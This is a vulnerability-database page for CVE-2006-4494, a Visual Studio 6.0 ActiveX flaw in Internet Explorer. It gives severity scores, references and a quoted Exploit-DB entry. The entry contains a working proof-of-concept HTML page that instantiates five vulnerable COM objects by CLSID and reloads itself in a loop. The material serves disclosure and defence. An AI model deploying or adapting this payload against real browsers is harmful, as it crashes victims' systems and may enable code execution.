CVE-2006-4494 : Detail

CVE-2006-4494

7.73%V3
Network
2006-08-31
20h00 +00:00
2018-10-17
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Visual Studio 6.0 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Visual Studio 6.0 ActiveX COM Objects in Internet Explorer, including (1) tcprops.dll, (2) fp30wec.dll, (3) mdt2db.dll, (4) mdt2qd.dll, and (5) vi30aut.dll.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 28401

Publication date : 2006-08-07 22h00 +00:00
Author : XSec
EDB Verified : Yes

source: https://www.securityfocus.com/bid/19572/info Microsoft Internet Explorer is prone to a denial-of-service vulnerability that occurs when instantiating Visual Studio COM objects. The vulnerability arises because of the way Internet Explorer tries to instantiate certain COM objects as ActiveX controls, resulting in denial-of-service conditions. Remote code execution may be possible, but this has not been confirmed. This BID may be related to the issues described in BID 14511 (Microsoft Internet Explorer COM Object Instantiation Buffer Overflow Vulnerability) and BID 15061 Microsoft Internet Explorer COM Object Instantiation Variant Vulnerability). Note, however, that this issue affects a different set of COM objects that were not addressed in the previous BIDs. <!-- // Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability // tested on Windows 2000/2003 // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {9AF971C5-8E7A-11D0-A2BB-00C04FC33E92} // Info: FpFile Class// ProgID: WECAPI.FpFile.1 // InprocServer32: C:\WINDOWS\System\FP30WEC.DLL // CLSID: {AB39F080-0F5D-11D1-8E2F-00C04FB68D60} // Info: TCExtPage Class // InprocServer32: C:\PROGRA~1\MICROS~1\Common\Tools\TCPROPS.DLL // CLSID: {CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8} // Info: FpaFile Class// ProgID: FpaFile.FpaFile.1 // InprocServer32: C:\WINDOWS\system\VI30AUT.DLL // CLSID: {E9B0E6CB-811C-11D0-AD51-00A0C90F5739} // Info: Microsoft Data Tools Query Designer// ProgID: MSDTQueryDesigner2 // InprocServer32: C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\mdt2qd.dll // CLSID: {E9B0E6D4-811C-11D0-AD51-00A0C90F5739} // Info: Microsoft Data Tools Database Designer// ProgID: MSDTDatabaseDesigner2 // InprocServer32: C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\mdt2db.dll --!> <html><body> <object classid="CLSID:{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}"> </object> <object classid="CLSID:{AB39F080-0F5D-11D1-8E2F-00C04FB68D60}"> </object> <object classid="CLSID:{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}"> </object> <object classid="CLSID:{E9B0E6CB-811C-11D0-AD51-00A0C90F5739}"> </object> <object classid="CLSID:{E9B0E6D4-811C-11D0-AD51-00A0C90F5739}"> </object> <!-- </body> <script>location.reload();</script> </html>

Products Mentioned

Configuraton 0

Microsoft>>Visual_studio >> Version 6.0

Microsoft>>Visual_studio >> Version 6.0

References

http://www.securityfocus.com/bid/19572
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/1473
Tags : third-party-advisory, x_refsource_SREASON